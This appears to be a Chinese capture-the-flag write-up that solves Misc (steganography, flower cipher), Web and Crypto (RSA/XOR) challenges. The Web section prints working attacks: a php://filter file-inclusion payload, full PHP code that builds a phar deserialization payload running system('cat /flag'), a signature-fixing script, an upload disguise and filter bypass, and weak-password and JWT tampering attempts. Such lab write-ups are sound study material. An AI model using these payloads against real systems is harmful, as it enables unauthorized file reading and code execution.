Misc
猜一猜
題目描述:
你們想要的flag就在壓縮包裡面。
壓縮包檔名 解密
解壓密碼為a1478520
然後修改flag.png檔案頭
得到
掃描二維碼之後
❀❁❀❇❀✼❀❂✿❆✿✽❁❀✿✾❂❅✿❄❂❉❀✿❂❆❀❃❀✿❂❆✿❀❁✾✻✿❁❁❀❁❂❊✻❂✿❈=
花朵解密
https://www.qqxiuzi.cn/bianma/wenbenjiami.php?s=huaduo
得到flag
flag{rUsJyNdKhdKuS4VfO7}
要的就在這
題目描述:
你要的在這裡
用010editor開啟
上面那個是定積分,解出來是π
然後6是什麼呢,猜測是3.1415
然後用stegpy解密
>python steg.py misc.png -p
Enter password (will not be echoed):
3557736c7371495153424738633644326d352f4b5277672b36676a6d3174723144513855794a556d495a733dk:luckyone
3557736c7371495153424738633644326d352f4b5277672b36676a6d3174723144513855794a556d495a733d
這一串十六進位制轉字元
5WslsqIQSBG8c6D2m5/KRwg+6gjm1tr1DQ8UyJUmIZs=
k:luckyone
flag{believe_you_are_lucky}
Web
消失的flag
題目描述:
flag就隱藏再某個檔案裡面,看看能不能包含出來 。
訪問
猜測是XFF,新增:x-forwarded-for:127.0.0.1
File is NUll
檔案包含漏洞
?file=/flag
用另一種方法
?file=php://filter/read=convert.base64-encode/resource=/flag
也不行
最後試出
?file=php://filter/convert.iconv.utf-8.utf-7/resource=/flag
df4083ae2869462cad0d002533f6cbf7
unserialize_web
同事給我了一個反序列話的原始碼,線上求助 !
看這篇文章有了靈感
https://blog.csdn.net/qq_53460654/article/details/121889104
https://pankas.top/2022/08/04/php(phar)反序列化漏洞及各種繞過姿勢/#phar反序列化
首先掃一下目錄發現/www.tar.gz
生成.phar
<?php
class File {
public $val1;
public $val2;
public $val3;
public function __construct() {
$this->val1 = "val1";
$this->val2 = "val2";
}
public function __destruct() {
if ($this->val1 === "file" && $this->val2 === "exists") {
if (preg_match('/^\s*system\s*\(\s*\'cat\s+\/[^;]*\'\s*\);\s*$/', $this->val3)) {
eval($this->val3);
} else {
echo "Access Denied";
}
}
}
public function __access() {
$Var = "Access Denied";
echo $Var;
}
public function __wakeup() {
$this->val1 = "exists";
$this->val2 = "file";
echo "檔案存在";
}
}
$f = new File();
$f->val1 = "file";
$f->val2 = "exists";
$f->val3 = "system('cat /flag');";
$p = new Phar("File.phar", 0);
$p->startBuffering();
$p->setMetadata($f);
$p->setStub("GIF89a" . "<?php __HALT_COMPILER();" . "?>");
$p->addFromString("test.txt", "test");
$p->stopBuffering();
?>
為了繞過__wakeup()方法,3要改為4
修改簽名
# -*- coding: utf-8 -*-
from hashlib import sha1
f = open('./File.phar', 'rb').read() # 修改內容後的phar檔案
s = f[:-28] # 獲取要簽名的資料
h = f[-8:] # 獲取簽名型別以及GBMB標識
newf = s+sha1(s).digest()+h # 資料 + 簽名 + 型別 + GBMB
open('Filenew.phar', 'wb').write(newf) # 寫入新檔案
分析upload.php可以看到
原始碼ban掉了 __HALT_COMPILER(); 標識,沒有這個是不認phar的,這個可以使用gzip壓縮排行繞過
然後修改字尾.gif,檔案上傳
最後用phar 協議觸發
phar://./upload/Filenew.phar.gif
5740619516574ce288f8f30d3f010e70
但我提交的是:f5cc52e28f364ad69c093a9a6dd1c954
flag是動態的
hackme
弱口令為admin:123456
然後顯示
remote ip address is block!
抓包得到
Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJ1c2VyIjoiYWRtaW4iLCJpcCI6IjE3Mi4yMC4yNDAuMzIifQ.DDtMChPMQtBA_2_wJxLPO_6g5dTaM7stY2Knngol6qAeaWh4Y8EjY6ndBLuEMhXYyecpiLFXZxEPqkV_GW3rGReg7LTCfIb4x6M6RRhotbersK1AGKKGUyVHmr0es0bHpw
改成none不行
掃目錄得到/vendor
分析裡面的檔案
可以看到https://github.com/firebase/php-jwt
然後沒思路了
mypdf
下載原始碼
Crypto
encipher
題目描述:
小明在學習加解密時,對輸入的重要資訊做了加密,但他又只是個菜雞,對加密後的資料不會解密,很需要大哥哥們的幫助 如下時小明加密後的資訊:
from Crypto.Util.number import getPrime, bytes_to_long
from Crypto.Util.strxor import strxor
from Crypto.PublicKey import RSA
def decrypt(c, N, d):
m = pow(c, d, N) #rsa_decrypt
origin = 24#in(xor_key)
xor_key = m.to_bytes(origin, byteorder='big')
key = b'Life is like an ocean on'
msg = strxor(xor_key, key)
msg = msg.decode()
return msg
#message = decrypt(ciphertext, N, d)
#print(message)
d = 4885628697024674802233453512637565599092248491488767824821990279922756927662223348312748794983451796542248787267207054348962258716585568185354414099671493917947012747791554070655258925730967322717771647407982984792632771150018212620323323635510053326184087327891569331050475507897640403090397521797022070233
N = 89714050971394259600440975863751229102748301873549839432714703551498380713981264101533375672970154214062583012365073892089644031804109941766201243163398926438698369735588338279544152140859123834763870759757751944228350552806429642516747541162527058800402619575257179607422628877017180197777983487523142664487
c = 67254133265602132458415338912590207677514059205474875492945840960242620760650527587490927820914970400738307536068560894182603885331513473363314148815933001614692570010664750071300871546575845539616570277302220914885734071483970427419582877989670767595897758329863040523037547687185382294469780732905652150451
mm=decrypt(c,N,d)
print(mm)
# flag{1s_Pa33w0rd_1y2u22}
flag{1s_Pa33w0rd_1y2u22}
End
